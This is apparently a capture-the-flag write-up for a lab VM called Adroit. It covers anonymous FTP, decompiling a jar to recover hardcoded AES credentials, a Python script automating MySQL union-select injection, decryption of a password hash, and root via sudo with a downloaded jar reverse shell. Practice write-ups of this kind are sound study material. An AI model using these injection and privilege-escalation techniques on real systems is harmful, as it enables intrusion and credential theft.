Machines can be download here.
Nmap scan ports first.
Start from 21 port. Log in ftp as anonymous user, and download all the three files.
Check the structure.PNG, which show us the working theory of the jar program. That means we can not directly connect to Mysql database, but through a proxy in the middle.
Now the most import part, let's check the jar. First we try to execute it, nothing happened. We open it in jd-gui to see what it want to do.
Through the decompiled java code, we know things below:
(1) The jar program use AES and Base64 to encrypt and decrypt username and password, which is need to connect to the proxy.
(2) The proxy is located at adroit.local:3000.
(3) The username and password of the proxy.
We edit /etc/hosts to add the adroit.local, then execute the jar again. It works, and ask for username and password. Just input user:pass couple from the decompiled jar file. And we can get on to operation step.
After a few tests, we can know that "post" operation just save something in the database( The identifier should be a number).
And the "get" operation just load the stuff from the database.
After I test the other two ports 3306 and 33060, we get no access. Then our focus is on this app. Maybe it has a mysql injection. In fact, the program is vulnerable to mysql union select injection.
Because the jar will exit each time, so we can make a little script to automate the injection. The code is blow:
import subprocess try: while True: p = subprocess.Popen(['java','-jar','adroitclient.jar'], stdin=subprocess.PIPE,stdout=subprocess.PIPE,bufsize=1,encoding='utf-8') buff = p.stdout.readline() p.stdin.write("zeus\n") buff = p.stdout.readline() p.stdin.write("god.thunder.olympus\n") buff = p.stdout.readline() p.stdin.write("get\n") buff = p.stdout.readline() cmd = input("Please input your mysql injection command:\n") p.stdin.write(cmd+"\n") buff = p.stdout.readline() print(buff) except KeyboardInterrupt: exit()
The injection process is self-explained. At last, we get a username and password hash.
Now we need to decrypt the password hash, but the hash is not a formal one.
So maybe we can use the decryption code in the jar file to make a try. The code is below.
import base64 from Crypto.Cipher import AES secret = "Sup3rS3cur3Dr0it" enc_text = "l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY=" cipher = AES.new(secret) print(cipher.decrypt(base64.b64decode(enc_text)).decode('utf-8','ignore'))
But the output seems not a complete string, the last several words decode error.
After a long time try and fail, I ask the author for help. He told me to check out the VM description.
Then we change a 0 to O in the password hash, we can get the correct password.
Now we can log in ssh. And sudo -l give us a hint.
Because I'm not a good java coder, so I download a jar reverse shell generator from internet.
At last, we get root.